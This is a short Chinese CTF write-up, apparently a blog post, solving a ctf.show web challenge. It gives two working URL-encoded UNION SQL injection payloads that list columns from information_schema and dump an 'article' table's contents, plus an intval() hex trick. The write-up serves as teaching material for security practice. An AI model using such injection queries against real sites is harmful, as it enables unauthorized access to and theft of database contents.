0x00 前言
- CTF 加解密合集
 - CTF Web合集
 
0x01 题目

0x02 Write Up
解法1
标准的数字型注入
查列名
http://cc3ecc3f-8c42-4624-979e-277a51ea85d2.challenge.ctf.show/?id=1%20union%20select%20table_name,column_name,3%20from%20information_schema.columns%20where%20table_name=%27article%27%20--+
 

 查数据
http://cc3ecc3f-8c42-4624-979e-277a51ea85d2.challenge.ctf.show/?id=1%20union%20select%201,content,3%20from%20article%20--+
 

解法2
intval()函数 如果遇到0x就会识别为0,所以可以通过十六进制进行查询?id=0x3E8

以上



![[MAUI]在.NET MAUI中实现可拖拽排序列表](https://img-blog.csdnimg.cn/01e40435cec24ba2b8a910a4783f8139.gif)



![【Linux】Shell脚本之流程控制语句 if判断、for循环、while循环、case循环判断 + 实战详解[⭐建议收藏!!⭐]](https://img-blog.csdnimg.cn/9573137493ad4504a3f463e81691b3fb.png)











